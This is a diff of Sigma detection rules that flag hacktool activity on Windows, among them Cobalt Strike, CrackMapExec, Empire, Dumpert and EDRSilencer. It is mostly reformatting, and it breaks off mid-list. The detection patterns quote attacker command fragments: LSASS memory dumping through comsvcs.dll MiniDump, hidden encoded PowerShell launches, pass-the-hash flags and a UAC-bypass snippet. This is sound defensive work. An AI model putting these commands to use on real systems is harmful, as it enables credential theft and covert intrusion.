a/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml @@ -1,8 +1,8 @@ title: Operator Bloopers Cobalt Strike Modules id: 4f154fb6-27d1-4813-a759-78b93e0b9c48 related: - - id: 647c7b9e-d784-4fda-b9a0-45c565a7b729 - type: similar + - id: 647c7b9e-d784-4fda-b9a0-45c565a7b729 + type: similar status: test description: Detects Cobalt Strike module/commands accidentally entered in CMD shell references: @@ -24,10 +24,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: Cmd.Exe - - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - Invoke-UserHunter - Invoke-ShareFinder - Invoke-Kerberoast diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml index 707ccf61f..94e390bdd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml @@ -1,8 +1,7 @@ title: CobaltStrike Load by Rundll32 id: ae9c6a7c-9521-42a6-915e-5aaa8689d529 status: test -description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs - from the command line. +description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line. references: - https://www.cobaltstrike.com/help-windows-executable - https://redcanary.com/threat-detection-report/ @@ -22,14 +21,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_rundll: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE - - CommandLine|contains: - - rundll32.exe - - 'rundll32 ' + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: + - rundll32.exe + - 'rundll32 ' selection_params: - CommandLine|contains: .dll - CommandLine|endswith: + CommandLine|contains: .dll + CommandLine|endswith: - ' StartW' - ',StartW' condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml index 909e7766c..837615d63 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml @@ -20,23 +20,23 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_generic_1: - CommandLine|endswith: cmd.exe /C whoami + CommandLine|endswith: cmd.exe /C whoami ParentImage|startswith: C:\Temp\ selection_generic_2: ParentImage|endswith: - \runonce.exe - \dllhost.exe - CommandLine|contains|all: + CommandLine|contains|all: - cmd.exe /c echo - '> \\\\.\\pipe' selection_conhost_1: ParentCommandLine|contains|all: - cmd.exe /C echo - ' > \\\\.\\pipe' - CommandLine|endswith: conhost.exe 0xffffffff -ForceV1 + CommandLine|endswith: conhost.exe 0xffffffff -ForceV1 selection_conhost_2: ParentCommandLine|endswith: /C whoami - CommandLine|endswith: conhost.exe 0xffffffff -ForceV1 + CommandLine|endswith: conhost.exe 0xffffffff -ForceV1 condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_coercedpotato.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_coercedpotato.yml index dfb45aab7..6c42aeb2b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_coercedpotato.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_coercedpotato.yml @@ -22,16 +22,16 @@ detection: selection_loader_img: Image|endswith: \CoercedPotato.exe selection_params: - CommandLine|contains: ' --exploitId ' + CommandLine|contains: ' --exploitId ' selection_loader_imphash: - - Imphash: - - a75d7669db6b2e107a44c4057ff7f7d6 - - f91624350e2c678c5dcbe5e1f24e22c9 - - 14c81850a079a87e83d50ca41c709a15 - - Hashes: - - IMPHASH=A75D7669DB6B2E107A44C4057FF7F7D6 - - IMPHASH=F91624350E2C678C5DCBE5E1F24E22C9 - - IMPHASH=14C81850A079A87E83D50CA41C709A15 + - Imphash: + - a75d7669db6b2e107a44c4057ff7f7d6 + - f91624350e2c678c5dcbe5e1f24e22c9 + - 14c81850a079a87e83d50ca41c709a15 + - Hashes: + - IMPHASH=A75D7669DB6B2E107A44C4057FF7F7D6 + - IMPHASH=F91624350E2C678C5DCBE5E1F24E22C9 + - IMPHASH=14C81850A079A87E83D50CA41C709A15 condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_covenant.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_covenant.yml index 218d2d309..aa209d25c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_covenant.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_covenant.yml @@ -21,16 +21,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - -Sta - -Nop - -Window - Hidden - CommandLine|contains: + CommandLine|contains: - -Command - -EncodedCommand selection_2: - CommandLine|contains: + CommandLine|contains: - 'sv o (New-Object IO.MemorySteam);sv d ' - mshta file.hta - GruntHTTP diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml index 1db66d434..e9d3c7aac 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml @@ -1,8 +1,7 @@ title: HackTool - CrackMapExec Execution id: 42a993dd-bb3e-48c8-b372-4d6684c4106c status: test -description: This rule detect common flag combinations used by CrackMapExec in order - to detect its use even if the binary has been replaced. +description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced. references: - https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local - https://www.mandiant.com/resources/telegram-malware-iranian-espionage @@ -34,45 +33,45 @@ detection: selection_binary: Image|endswith: \crackmapexec.exe selection_special: - CommandLine|contains: ' -M pe_inject ' + CommandLine|contains: ' -M pe_inject ' selection_execute: - CommandLine|contains|all: + CommandLine|contains|all: - ' --local-auth' - ' -u ' - ' -x ' selection_hash: - CommandLine|contains|all: + CommandLine|contains|all: - ' --local-auth' - ' -u ' - ' -p ' - - ' -H ''NTHASH''' + - " -H 'NTHASH'" selection_module_mssql: - CommandLine|contains|all: + CommandLine|contains|all: - ' mssql ' - ' -u ' - ' -p ' - ' -M ' - ' -d ' selection_module_smb1: - CommandLine|contains|all: + CommandLine|contains|all: - ' smb ' - ' -u ' - ' -H ' - ' -M ' - ' -o ' selection_module_smb2: - CommandLine|contains|all: + CommandLine|contains|all: - ' smb ' - ' -u ' - ' -p ' - ' --local-auth' part_localauth_1: - CommandLine|contains|all: + CommandLine|contains|all: - ' --local-auth' - ' -u ' - ' -p ' part_localauth_2: - CommandLine|contains|all: + CommandLine|contains|all: - ' 10.' - ' 192.168.' - '/24 ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml index 034db3c98..3c64a47cc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml @@ -23,11 +23,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: + # cme/protocols/smb/wmiexec.py (generalized execute_remote and execute_fileless) - cmd.exe /Q /c * 1> \\\\*\\*\\* 2>&1 + # cme/protocols/smb/atexec.py:109 (fileless output via share) - cmd.exe /C * > \\\\*\\*\\* 2>&1 + # cme/protocols/smb/atexec.py:111 (fileless output via share) - cmd.exe /C * > *\\Temp\\* 2>&1 + # https://github.com/byt3bl33d3r/CrackMapExec/blob/d8c50c8cbaf36c29329078662473f75e440978d2/cme/helpers/powershell.py#L136 (PowerShell execution with obfuscation) - powershell.exe -exec bypass -noni -nop -w 1 -C " + # https://github.com/byt3bl33d3r/CrackMapExec/blob/d8c50c8cbaf36c29329078662473f75e440978d2/cme/helpers/powershell.py#L160 (PowerShell execution without obfuscation) - 'powershell.exe -noni -nop -w 1 -enc ' condition: process_creation and selection falsepositives: diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml index 4c7bd78ab..1ddfe9ab3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml @@ -1,8 +1,7 @@ title: HackTool - CrackMapExec Process Patterns id: f26307d8-14cd-47e3-a26b-4b4769f24af6 status: test -description: Detects suspicious process patterns found in logs when CrackMapExec is - used +description: Detects suspicious process patterns found in logs when CrackMapExec is used references: - https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass author: Florian Roth (Nextron Systems) @@ -20,27 +19,27 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_lsass_dump1: - CommandLine|contains|all: + CommandLine|contains|all: - 'tasklist /fi ' - Imagename eq lsass.exe - CommandLine|contains: + CommandLine|contains: - 'cmd.exe /c ' - 'cmd.exe /r ' - 'cmd.exe /k ' - 'cmd /c ' - 'cmd /r ' - 'cmd /k ' - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI selection_lsass_dump2: - CommandLine|contains|all: + CommandLine|contains|all: - do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump - \Windows\Temp\ - ' full' - '%%B' selection_procdump: - CommandLine|contains|all: + CommandLine|contains|all: - tasklist /v /fo csv - findstr /i "lsass" condition: process_creation and (1 of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml index b2ae28ac1..22ca13f71 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml @@ -1,8 +1,7 @@ title: HackTool - CrackMapExec PowerShell Obfuscation id: 6f8b3439-a203-45dc-a88b-abf57ea15ccf status: test -description: The CrachMapExec pentesting framework implements a PowerShell obfuscation - with some static strings detected by this rule. +description: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule. references: - https://github.com/byt3bl33d3r/CrackMapExec - https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242 @@ -23,20 +22,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains: + CommandLine|contains: - join*split + # Line 343ff - ( $ShellId[1]+$ShellId[13]+'x') - ( $PSHome[*]+$PSHOME[*]+ - ( $env:Public[13]+$env:Public[5]+'x') - ( $env:ComSpec[4,*,25]-Join'') - - '[1,3]+''x''-Join'''')' + - "[1,3]+'x'-Join'')" condition: process_creation and (all of selection_*) fields: - ComputerName diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_createminidump.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_createminidump.yml index 6da1dd9da..dce39d347 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_createminidump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_createminidump.yml @@ -1,8 +1,7 @@ title: HackTool - CreateMiniDump Execution id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d status: test -description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process - memory for credential extraction on the attacker's machine +description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine references: - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass author: Florian Roth (Nextron Systems) @@ -20,9 +19,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \CreateMiniDump.exe - - Imphash: 4a07f944a83e8a7c2525efa35dd30e2f - - Hashes|contains: IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f + - Image|endswith: \CreateMiniDump.exe + - Imphash: 4a07f944a83e8a7c2525efa35dd30e2f + - Hashes|contains: IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_dinjector.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_dinjector.yml index a356ac39a..d76009983 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_dinjector.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_dinjector.yml @@ -1,10 +1,9 @@ title: HackTool - DInjector PowerShell Cradle Execution id: d78b5d61-187d-44b6-bf02-93486a80de5a status: test -description: Detects the use of the Dinject PowerShell cradle based on the specific - flags +description: Detects the use of the Dinject PowerShell cradle based on the specific flags references: - - https://github.com/snovvcrash/DInjector + - https://github.com/snovvcrash/DInjector # Original got deleted. This is a fork author: Florian Roth (Nextron Systems) date: 2021/12/07 modified: 2023/02/04 @@ -20,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' /am51' - ' /password' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_dumpert.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_dumpert.yml index 49ed8b151..55b7f897a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_dumpert.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_dumpert.yml @@ -1,8 +1,7 @@ title: HackTool - Dumpert Process Dumper Execution id: 2704ab9e-afe2-4854-a3b1-0c0706d03578 status: test -description: Detects the use of Dumpert process dumper, which dumps the lsass.exe - process memory +description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory references: - https://github.com/outflanknl/Dumpert - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/ @@ -21,8 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Hashes|contains: 09D278F9DE118EF09163C6140255C690 - - CommandLine|contains: Dumpert.dll + - Hashes|contains: 09D278F9DE118EF09163C6140255C690 + - CommandLine|contains: Dumpert.dll condition: process_creation and selection falsepositives: - Very unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_edrsilencer.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_edrsilencer.yml index 59cb9e8ac..26500619a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_edrsilencer.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_edrsilencer.yml @@ -1,11 +1,8 @@ title: HackTool - EDRSilencer Execution id: eb2d07d4-49cb-4523-801a-da002df36602 status: experimental -description: 'Detects the execution of EDRSilencer, a tool that leverages Windows - Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents - from reporting security events to the server based on PE metadata information. - - ' +description: | + Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information. references: - https://github.com/netero1010/EDRSilencer author: '@gott_cyber' @@ -22,9 +19,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \EDRSilencer.exe - - OriginalFileName: EDRSilencer.exe - - Description|contains: EDRSilencer + - Image|endswith: \EDRSilencer.exe + - OriginalFileName: EDRSilencer.exe + - Description|contains: EDRSilencer condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml index 0e5301fba..92109dd16 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml @@ -22,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - ' -NoP -sta -NonI -W Hidden -Enc ' - ' -noP -sta -w 1 -enc ' - ' -NoP -NonI -W Hidden -enc ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml index 2ce827d88..690a7e00d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml @@ -22,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - ' -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update)' - ' -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update);' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_evil_winrm.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_evil_winrm.yml index 0766bc7f4..09177cecb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_evil_winrm.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_evil_winrm.yml @@ -1,9 +1,7 @@ title: HackTool - WinRM Access Via Evil-WinRM id: a197e378-d31b-41c0-9635-cfdf1c1bb423 status: test -description: Adversaries may use Valid Accounts to log into a computer using the Remote - Desktop Protocol (RDP). The adversary may then perform actions as the logged-on - user. +description: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm - https://github.com/Hackplayers/evil-winrm @@ -23,7 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_mstsc: Image|endswith: \ruby.exe - CommandLine|contains|all: + CommandLine|contains|all: - '-i ' - '-u ' - '-p ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml index 1cf97d600..390c1f3c2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml @@ -1,8 +1,7 @@ title: Hacktool Execution - Imphash id: 24e3e58a-646b-4b50-adef-02ef935b9fc8 status: test -description: Detects the execution of different Windows based hacktools via their - import hash (imphash) even if the files have been renamed +description: Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed references: - Internal Research author: Florian Roth (Nextron Systems) @@ -21,182 +20,182 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Imphash: - - bcca3c247b619dcd13c8cdff5f123932 - - 3a19059bd7688cb88e70005f18efc439 - - bf6223a49e45d99094406777eb6004ba - - 23867a89c2b8fc733be6cf5ef902f2d1 - - a37ff327f8d48e8a4d2f757e1b6e70bc - - f9a28c458284584a93b14216308d31bd - - 6118619783fc175bc7ebecff0769b46e - - 959a83047e80ab68b368fdb3f4c6e4ea - - 563233bfa169acc7892451f71ad5850a - - 87575cb7a0e0700eb37f2e3668671a08 - - 13f08707f759af6003837a150a371ba1 - - 1781f06048a7e58b323f0b9259be798b - - 233f85f2d4bc9d6521a6caae11a1e7f5 - - 24af2584cbf4d60bbe5c6d1b31b3be6d - - 632969ddf6dbf4e0f53424b75e4b91f2 - - 713c29b396b907ed71a72482759ed757 - - 749a7bb1f0b4c4455949c0b2bf7f9e9f - - 8628b2608957a6b0c6330ac3de28ce2e - - 8b114550386e31895dfab371e741123d - - 94cb940a1a6b65bed4d5a8f849ce9793 - - 9d68781980370e00e0bd939ee5e6c141 - - b18a1401ff8f444056d29450fbc0a6ce - - cb567f9498452721d77a451374955f5f - - 730073214094cd328547bf1f72289752 - - 17b461a082950fc6332228572138b80c - - dc25ee78e2ef4d36faa0badf1e7461c9 - - 819b19d53ca6736448f9325a85736792 - - 829da329ce140d873b4a8bde2cbfaa7e - - c547f2e66061a8dffb6f5a3ff63c0a74 - - 0588081ab0e63ba785938467e1b10cca - - 0d9ec08bac6c07d9987dfd0f1506587c - - bc129092b71c89b4d4c8cdf8ea590b29 - - 4da924cf622d039d58bce71cdf05d242 - - e7a3a5c377e2d29324093377d7db1c66 - - 9a9dbec5c62f0380b4fa5fd31deffedf - - af8a3976ad71e5d5fdfb67ddb8dadfce - - 0c477898bbf137bbd6f2a54e3b805ff4 - - 0ca9f02b537bcea20d4ea5eb1a9fe338 - - 3ab3655e5a14d4eefc547f4781bf7f9e - - e6f9d5152da699934b30daab206471f6 - - 3ad59991ccf1d67339b319b15a41b35d - - ffdd59e0318b85a3e480874d9796d872 - - 0cf479628d7cc1ea25ec7998a92f5051 - - 07a2d4dcbd6cb2c6a45e6b101f0b6d51 - - d6d0f80386e1380d05cb78e871bc72b1 - - 38d9e015591bbfd4929e0d0f47fa0055 - - 0e2216679ca6e1094d63322e3412d650 - - ada161bf41b8e5e9132858cb54cab5fb - - 2a1bc4913cd5ecb0434df07cb675b798 - - 11083e75553baae21dc89ce8f9a195e4 - - a23d29c9e566f2fa8ffbb79267f5df80 - - 4a07f944a83e8a7c2525efa35dd30e2f - - 767637c23bb42cd5d7397cf58b0be688 - - 14c4e4c72ba075e9069ee67f39188ad8 - - 3c782813d4afce07bbfc5a9772acdbdc - - 7d010c6bb6a3726f327f7e239166d127 - - 89159ba4dd04e4ce5559f132a9964eb3 - - 6f33f4a5fc42b8cec7314947bd13f30f - - 5834ed4291bdeb928270428ebbaf7604 - - 5a8a8a43f25485e7ee1b201edcbc7a38 - - dc7d30b90b2d8abf664fbed2b1b59894 - - 41923ea1f824fe63ea5beb84db7a3e74 - - 3de09703c8e79ed2ca3f01074719906b - - a53a02b997935fd8eedcb5f7abab9b9f - - e96a73c7bf33a464c510ede582318bf2 - - 32089b8851bbf8bc2d014e9f37288c83 - - 09D278F9DE118EF09163C6140255C690 - - 03866661686829d806989e2fc5a72606 - - e57401fbdadcd4571ff385ab82bd5d6d - - 84B763C45C0E4A3E7CA5548C710DB4EE - - 19584675d94829987952432e018d5056 - - 330768a4f172e10acb6287b87289d83b - - 885c99ccfbe77d1cbfcb9c4e7c1a3313 - - 22a22bc9e4e0d2f189f1ea01748816ac - - 7fa30e6bb7e8e8a69155636e50bf1b28 - - 96df3a3731912449521f6f8d183279b1 - - 7e6cf3ff4576581271ac8a313b2aab46 - - 51791678f351c03a0eb4e2a7b05c6e17 - - 25ce42b079282632708fc846129e98a5 - - 021bcca20ba3381b11bdde26b4e62f20 - - 59223b5f52d8799d38e0754855cbdf42 - - 81e75d8f1d276c156653d3d8813e4a43 - - 17244e8b6b8227e57fe709ccad421420 - - 5b76da3acdedc8a5cdf23a798b5936b4 - - cb2b65bb77d995cc1c0e5df1c860133c - - 40445337761d80cf465136fafb1f63e6 - - 8a790f401b29fa87bc1e56f7272b3aa6 - - Hashes|contains: - - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 - - IMPHASH=3A19059BD7688CB88E70005F18EFC439 - - IMPHASH=bf6223a49e45d99094406777eb6004ba - - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 - - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC - - IMPHASH=F9A28C458284584A93B14216308D31BD - - IMPHASH=6118619783FC175BC7EBECFF0769B46E - - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA - - IMPHASH=563233BFA169ACC7892451F71AD5850A - - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 - - IMPHASH=13F08707F759AF6003837A150A371BA1 - - IMPHASH=1781F06048A7E58B323F0B9259BE798B - - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 - - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D - - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 - - IMPHASH=713C29B396B907ED71A72482759ED757 - - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F - - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E - - IMPHASH=8B114550386E31895DFAB371E741123D - - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 - - IMPHASH=9D68781980370E00E0BD939EE5E6C141 - - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE - - IMPHASH=CB567F9498452721D77A451374955F5F - - IMPHASH=730073214094CD328547BF1F72289752 - - IMPHASH=17B461A082950FC6332228572138B80C - - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 - - IMPHASH=819B19D53CA6736448F9325A85736792 - - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E - - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 - - IMPHASH=0588081AB0E63BA785938467E1B10CCA - - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C - - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 - - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 - - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 - - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF - - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE - - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 - - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 - - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E - - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 - - IMPHASH=3AD59991CCF1D67339B319B15A41B35D - - IMPHASH=FFDD59E0318B85A3E480874D9796D872 - - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 - - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 - - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 - - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 - - IMPHASH=0E2216679CA6E1094D63322E3412D650 - - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB - - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 - - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 - - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 - - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F - - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 - - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 - - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC - - IMPHASH=7D010C6BB6A3726F327F7E239166D127 - - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 - - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F - - IMPHASH=5834ED4291BDEB928270428EBBAF7604 - - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 - - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 - - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 - - IMPHASH=3DE09703C8E79ED2CA3F01074719906B - - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F - - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 - - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 - - IMPHASH=09D278F9DE118EF09163C6140255C690 - - IMPHASH=03866661686829d806989e2fc5a72606 - - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d - - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE - - IMPHASH=19584675D94829987952432E018D5056 - - IMPHASH=330768A4F172E10ACB6287B87289D83B - - IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313 - - IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC - - IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28 - - IMPHASH=96DF3A3731912449521F6F8D183279B1 - - IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46 - - IMPHASH=51791678F351C03A0EB4E2A7B05C6E17 - - IMPHASH=25CE42B079282632708FC846129E98A5 - - IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20 - - IMPHASH=59223B5F52D8799D38E0754855CBDF42 - - IMPHASH=81E75D8F1D276C156653D3D8813E4A43 - - IMPHASH=17244E8B6B8227E57FE709CCAD421420 - - IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4 - - IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C - - IMPHASH=40445337761D80CF465136FAFB1F63E6 - - IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6 + - Imphash: + - bcca3c247b619dcd13c8cdff5f123932 # PetitPotam + - 